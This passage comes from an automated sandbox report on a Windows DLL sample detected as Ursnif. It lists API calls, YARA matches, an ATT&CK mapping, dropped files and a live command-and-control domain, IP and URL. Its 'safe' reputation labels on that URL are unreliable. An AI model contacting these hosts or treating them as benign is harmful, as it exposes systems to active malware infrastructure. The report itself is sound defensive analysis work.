                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E203B20 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E203B20
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E1FB460 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6E1FB460
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\6a76e615_by_Libranalysis.dll',#1Jump to behavior
                      Source: loaddll32.exe, 00000000.00000002.461736596.0000000001100000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.462047615.0000000002BD0000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: loaddll32.exe, 00000000.00000002.461736596.0000000001100000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.462047615.0000000002BD0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: loaddll32.exe, 00000000.00000002.461736596.0000000001100000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.462047615.0000000002BD0000.00000002.00000001.sdmpBinary or memory string: Progman
                      Source: loaddll32.exe, 00000000.00000002.461736596.0000000001100000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.462047615.0000000002BD0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,0_2_6E1D1566
                      Source: C:\Windows\System32\loaddll32.exeCode function: ____lc_handle_func,GetLocaleInfoA,0_2_6E1FB300
                      Source: C:\Windows\System32\loaddll32.exeCode function: GetLocaleInfoA,0_2_6E225D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,3_2_6E1D1566
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6E220AD0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: ____lc_handle_func,GetLocaleInfoA,3_2_6E1FB300
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,GetACP,GetLocaleInfoA,3_2_6E221380
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_6E220790
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6E220FD0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoA,3_2_6E225D90
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: _strlen,EnumSystemLocalesA,3_2_6E2211F0
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D17A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,0_2_6E1D17A7
                      Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_6E1D146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,0_2_6E1D146C
                      Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.333514865.0000000000520000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.329638923.0000000003FE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.329940794.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.528d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.3fe8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.7c8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1d0000.2.unpack, type: UNPACKEDPE
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.389725229.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389658064.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389739083.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.464518953.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389632359.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389705894.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389749777.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389559499.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389608210.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5568, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.333514865.0000000000520000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.329638923.0000000003FE0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000003.329940794.00000000007C0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 3.2.rundll32.exe.6e1d0000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.3.loaddll32.exe.528d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.3.rundll32.exe.3fe8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.3.rundll32.exe.7c8d29.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.loaddll32.exe.6e1d0000.2.unpack, type: UNPACKEDPE
                      Yara detected UrsnifShow sources
                      Source: Yara matchFile source: 00000000.00000003.389725229.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389658064.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389739083.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.464518953.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389632359.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389705894.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389749777.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389559499.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.389608210.0000000003358000.00000004.00000040.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 5568, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation2Path InterceptionProcess Injection12Masquerading1OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsNative API1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryQuery Registry1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information1Security Account ManagerSecurity Software Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Rundll321NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery24VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 406107 Sample: 6a76e615_by_Libranalysis Startdate: 06/05/2021 Architecture: WINDOWS Score: 88 23 Multi AV Scanner detection for domain / URL 2->23 25 Found malware configuration 2->25 27 Multi AV Scanner detection for submitted file 2->27 29 2 other signatures 2->29 7 loaddll32.exe 1 2->7         started        10 iexplore.exe 2 83 2->10         started        process3 signatures4 31 Writes or reads registry keys via WMI 7->31 33 Writes registry values via WMI 7->33 12 cmd.exe 1 7->12         started        14 rundll32.exe 7->14         started        16 iexplore.exe 35 10->16         started        process5 dnsIp6 19 rundll32.exe 12->19         started        21 green.salurober.com 34.86.224.8, 49704, 49705, 80 GOOGLEUS United States 16->21 process7

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      6a76e615_by_Libranalysis.dll29%VirustotalBrowse
                      6a76e615_by_Libranalysis.dll30%ReversingLabsWin32.Worm.Cridex

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      0.2.loaddll32.exe.5a0000.0.unpack100%AviraHEUR/AGEN.1108168Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      green.salurober.com8%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://green.salurober.com/egg0bSJn4ObK/ch_2F9lMPXs/fO3mZ53deXfDrA/fFpIrCwIBcA2fafEjJROE/_2FRp0luL600%Avira URL Cloudsafe
                      http://www.wikipedia.com/0%URL Reputationsafe
                      http://www.wikipedia.com/0%URL Reputationsafe
                      http://www.wikipedia.com/0%URL Reputationsafe
                      http://www.wikipedia.com/0%URL Reputationsafe
                      http://deeplow.ruB0%Avira URL Cloudsafe
                      http://green.salurober.com/egg0bSJn4ObK/ch_2F9lMPXs/fO3mZ53deXfDrA/fFpIrCwIBcA2fafEjJROE/_2FRp0luL60r80DP/FChSncsB8SqrhdJ/_2FXtQYnl2ITaT9OH4/qVdqvFpku/l5Z_2BwlLO28ejlDZ4Xv/ZR0P9bZC7mrWzK2nsLX/wmJroXqHSsCiyywQoJG_2B/ja6fWO6EY6PRe/fsgqsP8a/8D7PMyq0Et_2Bw5od_2BLED/JSk7_2F_2B/ptgvp19MaEwrG0884/hUO8hPN4NRV3/myPEhfLIkFj/6E7GZZkxutBKlj/2G265rer_2FHZz0gfwlBV/vusAOmr1_/2BAGh_2B0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      green.salurober.com
                      34.86.224.8
                      truefalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://green.salurober.com/egg0bSJn4ObK/ch_2F9lMPXs/fO3mZ53deXfDrA/fFpIrCwIBcA2fafEjJROE/_2FRp0luL60r80DP/FChSncsB8SqrhdJ/_2FXtQYnl2ITaT9OH4/qVdqvFpku/l5Z_2BwlLO28ejlDZ4Xv/ZR0P9bZC7mrWzK2nsLX/wmJroXqHSsCiyywQoJG_2B/ja6fWO6EY6PRe/fsgqsP8a/8D7PMyq0Et_2Bw5od_2BLED/JSk7_2F_2B/ptgvp19MaEwrG0884/hUO8hPN4NRV3/myPEhfLIkFj/6E7GZZkxutBKlj/2G265rer_2FHZz0gfwlBV/vusAOmr1_/2BAGh_2Bfalse
                      • Avira URL Cloud: safe
                      unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://green.salurober.com/egg0bSJn4ObK/ch_2F9lMPXs/fO3mZ53deXfDrA/fFpIrCwIBcA2fafEjJROE/_2FRp0luL60{9B20D491-AED4-11EB-90E4-ECF4BB862DED}.dat.17.drtrue
                      • Avira URL Cloud: safe
                      unknown
                      http://www.wikipedia.com/msapplication.xml6.17.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      http://www.amazon.com/msapplication.xml.17.drfalse
                        high
                        http://www.nytimes.com/msapplication.xml3.17.drfalse
                          high
                          http://www.live.com/msapplication.xml2.17.drfalse
                            high
                            http://deeplow.ruBloaddll32.exe, 00000000.00000002.465196621.000000006E2B1000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.463603336.000000006E2B1000.00000002.00020000.sdmp, 6a76e615_by_Libranalysis.dllfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://www.reddit.com/msapplication.xml4.17.drfalse
                              high
                              http://www.twitter.com/msapplication.xml5.17.drfalse
                                high
                                http://www.youtube.com/msapplication.xml7.17.drfalse
                                  high

                                  Contacted IPs

                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs

                                  Public

                                  IPDomainCountryFlagASNASN NameMalicious
                                  34.86.224.8
                                  green.salurober.comUnited States
                                  15169GOOGLEUSfalse

                                  General Information

                                  Joe Sandbox Version:32.0.0 Black Diamond
                                  Analysis ID:406107
                                  Start date:06.05.2021
                                  Start time:18:34:02
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 6m 50s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Sample file name:6a76e615_by_Libranalysis (renamed file extension from none to dll)
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:21
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Detection:MAL
                                  Classification:mal88.troj.winDLL@10/22@1/1
                                  EGA Information:Failed
                                  HDC Information:
                                  • Successful, ratio: 7% (good quality ratio 6.6%)
                                  • Quality average: 79.9%
                                  • Quality standard deviation: 28.3%
                                  HCA Information:Failed
                                  Cookbook Comments:
                                  • Adjust boot time
                                  • Enable AMSI
                                  Warnings:
                                  Show All
                                  • Excluded IPs from analysis (whitelisted): 104.43.193.48, 52.255.188.83, 168.61.161.212, 13.64.90.137, 184.30.24.56, 13.88.21.125, 8.241.78.254, 8.241.90.254, 8.241.83.126, 8.238.35.254, 8.241.78.126, 88.221.62.148, 152.199.19.161
                                  • Excluded domains from analysis (whitelisted): skypedataprdcolwus17.cloudapp.net, fs.microsoft.com, ie9comview.vo.msecnd.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, skypedataprdcolcus15.cloudapp.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, skypedataprdcoleus17.cloudapp.net, go.microsoft.com, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, go.microsoft.com.edgekey.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net, au-bg-shim.trafficmanager.net, cs9.wpc.v0cdn.net
                                  • Report size getting too big, too many NtOpenKeyEx calls found.

                                  Simulations

                                  Behavior and APIs

                                  No simulations

                                  Joe Sandbox View / Context

                                  IPs

                                  No context

                                  Domains

                                  No context

                                  ASN

                                  No context

                                  JA3 Fingerprints

                                  No context

                                  Dropped Files

                                  No context

                                  Created / dropped Files

                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{9B20D48F-AED4-11EB-90E4-ECF4BB862DED}.dat
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:Microsoft Word Document
                                  Category:dropped
                                  Size (bytes):29272
                                  Entropy (8bit):1.7743734001829912
                                  Encrypted:false
                                  SSDEEP:192:rBZGZS2TWNTtN8dfNCmhoMqZiFJJQWAiB:rHiRqrWVRhtqZiDJQWAU
                                  MD5:329C5791845991B14F943D8704DAA0B1
                                  SHA1:A5036FCA30ED9F659CEE09B08AB123268F806DE3
                                  SHA-256:A0D15FDADBB9DDE434EAC1B63B7CDE1DC482974FB00D2641A76A3F74A1418BFE
                                  SHA-512:D082ADF307C43ED9EEFE1CF5642CEBD871939C3E45AFCF39C7DFF59B0AE88E7ACC2F74EE6B3C5BDE568B8852A2937E7C514513E2986D8057C5D1381FEC8F038E
                                  Malicious:false
                                  Reputation:low
                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{9B20D491-AED4-11EB-90E4-ECF4BB862DED}.dat
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:Microsoft Word Document
                                  Category:dropped
                                  Size (bytes):28120
                                  Entropy (8bit):1.9055818644411726
                                  Encrypted:false
                                  SSDEEP:96:rxZOVQu6EBSJjl2DW6MqlJkz+3H1Jqkz+3Fgpr:rxZOVQu6EkJjl2DW6MqlfX1M2r
                                  MD5:EDF80852605AACD09AE783EC216CF711
                                  SHA1:C0446AE0C40114BC8D0D13C9AB142F9D808D2829
                                  SHA-256:335681B5E564427F76562A6D6D7AD6D7348355151401E8C0FEB355CD26B9A95D
                                  SHA-512:CCA19C24B70A285B0F9F9F1F279ABB3B3E600FB04264F0F771CE6B43AAA37FD699E86777899706910806259220DB1770E5F51FD41D0F6739D637FB48F258CCC8
                                  Malicious:false
                                  Reputation:low
                                  Preview: ................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-17529550060\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):656
                                  Entropy (8bit):5.106451702405661
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNxOEiKTnWimI002EtM3MHdNMNxOEiKTnWimI00ObVbkEtMb:2d6NxOFKTSZHKd6NxOFKTSZ76b
                                  MD5:C2AF277C2F544EF628C6F67A4B869C83
                                  SHA1:2060CCA43174810BDA3D00D9AA1E63CE2F58CD56
                                  SHA-256:F7F158C84B509E091B138DC60B568D42F5B04FD77778B0BD738847797AF14F46
                                  SHA-512:9A84C90EC67890C39052A386E0FD0EB1AF671DB12FBB13823190A30E0FCB220C15CE932EF2DF10C9CF8AEB16F0F6D5C7D45818F7FDDFC9A49145E33F84FC03BB
                                  Malicious:false
                                  Reputation:low
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x715da995,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x715da995,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig>..
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-18270793970\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):653
                                  Entropy (8bit):5.135910629543779
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNxe2kdRvnWimI002EtM3MHdNMNxe2kdRvnWimI00Obkak6EtMb:2d6NxreSZHKd6NxreSZ7Aa7b
                                  MD5:717191D4BDF943CFCD5536E48BB5D16E
                                  SHA1:A839440C2B850E181D3FB8BB17109FE52019029B
                                  SHA-256:B561A23907D0F5E5BE5FF28A2E3ABCA0477CBD90DFB6065D3302F233C323A4CE
                                  SHA-512:416D99EB4B9A557C8C1E221A393CFDE2E159D969FA62CEED3208BA7C6787042062FC6121A4C0D1F44B2DA508E32D5D911A73886BC0C8D20170B49DB33F67E7AB
                                  Malicious:false
                                  Reputation:low
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x71542076,0x01d742e1</date><accdate>0x71542076,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.amazon.com/"/><date>0x71542076,0x01d742e1</date><accdate>0x71542076,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Amazon.url"/></tile></msapplication></browserconfig>..
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-21706820\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):662
                                  Entropy (8bit):5.124205105045539
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNxvLiKTnWimI002EtM3MHdNMNxvLiKTnWimI00ObmZEtMb:2d6NxvGKTSZHKd6NxvGKTSZ7mb
                                  MD5:1E89FB064F884C39AAD7F1B098D7DA03
                                  SHA1:16349438B04D04F924804DECDBDD0D89845F9326
                                  SHA-256:8726F81D8F0417EEB7563403AC31193E335634F5DA20AE162AFA36910778B604
                                  SHA-512:915E08236D2864091A57965A232D842F0B5CC1D521135910419A6A89DD3417594934CBA7883117F721003762EFECE50C46D76C6A16BA41257574F2B318D94D6B
                                  Malicious:false
                                  Reputation:low
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x715da995,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.wikipedia.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x715da995,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Wikipedia.url"/></tile></msapplication></browserconfig>..
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-4759708130\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):647
                                  Entropy (8bit):5.100898923936443
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNxixnWimI002EtM3MHdNMNxixnWimI00Obd5EtMb:2d6NxSSZHKd6NxSSZ7Jjb
                                  MD5:176B2977A5B85BCBF5B08EC3C07C49F8
                                  SHA1:FFA2FF0642C78A083049365601AF970E66B5667D
                                  SHA-256:68D9B0A83E140BE782919E6085AFC57165108F68A7CC3DA1EA0F874ECFC2D00A
                                  SHA-512:27EC9A22BB78E2360B2004A90E2382120F4D2033C73BC45BB8FFDE883F99C6FD339F048F41453923793A889E0CD383BAD3E40960F9B97DBEB4D90165A9E745B7
                                  Malicious:false
                                  Reputation:low
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x7158e55c,0x01d742e1</date><accdate>0x7158e55c,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.live.com/"/><date>0x7158e55c,0x01d742e1</date><accdate>0x7158e55c,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Live.url"/></tile></msapplication></browserconfig>..
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-6757900\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):656
                                  Entropy (8bit):5.148837651421818
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNxhGwiKTnWimI002EtM3MHdNMNxhGwiOVovnWimI00Ob8K075EtMb:2d6NxQhKTSZHKd6NxQh6ovSZ7YKajb
                                  MD5:5C298F81FCAA04216F2530A930C37C4C
                                  SHA1:EFB52CE883A164586E257FAAF3A856BA5DDED7E9
                                  SHA-256:D6328A3A011DC121B2DDEE6990E09E61AA0FB2843B49B434E7F98888FA446ECA
                                  SHA-512:7D66B8D68733D77F8742D567C54658A7FECEA50C5FA345A5F17D3BE9C6CDF9DB61AFED7A48EF9CDEC8454290714E9CE8B924F65FC5F7690C86BFC19DD5B160EA
                                  Malicious:false
                                  Reputation:low
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x715da995,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x715da995,0x01d742e1</date><accdate>0x71600bb4,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig>..
                                  C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-8760897390\msapplication.xml
                                  Process:C:\Program Files\internet explorer\iexplore.exe
                                  File Type:XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
                                  Category:dropped
                                  Size (bytes):653
                                  Entropy (8bit):5.126476726885286
                                  Encrypted:false
                                  SSDEEP:12:TMHdNMNx0n40vnWimI002EtM3MHdNMNx0n40vnWimI00ObxEtMb:2d6Nx0BSZHKd6Nx0BSZ7nb
                                  MD5:EDAB3B2A7ECCB41CCE5AAD1579CBF606
                                  SHA1:061A0A2FF59DDE6EA3BC1580B0C3FA75A280C5AC
                                  SHA-256:DB7D20BFC9C332DA8CE7A739B9F7D1493653B79E58E9EA7FD175C0B3F435BFAF
                                  SHA-512:8BEBD19A90E6FD4CCD836B7E0B17EE5AF72A54054E368E644005A2CAB626FA944D18D3AEDD8E1C31E26194A442940CC61986F6B16268EF1012616ABA95D8DC23
                                  Malicious:false
                                  Reputation:low
                                  Preview: <?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x715b4756,0x01d742e1</date><accdate>0x715b4756,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig>..<?xml version="1.0" encoding="utf-8"?>..<browserconfig><msapplication><config><site src="http://www.reddit.com/"/><date>0x715b4756,0x01d742e1</date><accdate>0x715b4756,0x01d742e1</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Reddit.url"/></tile></msapplication></browserconfig>..
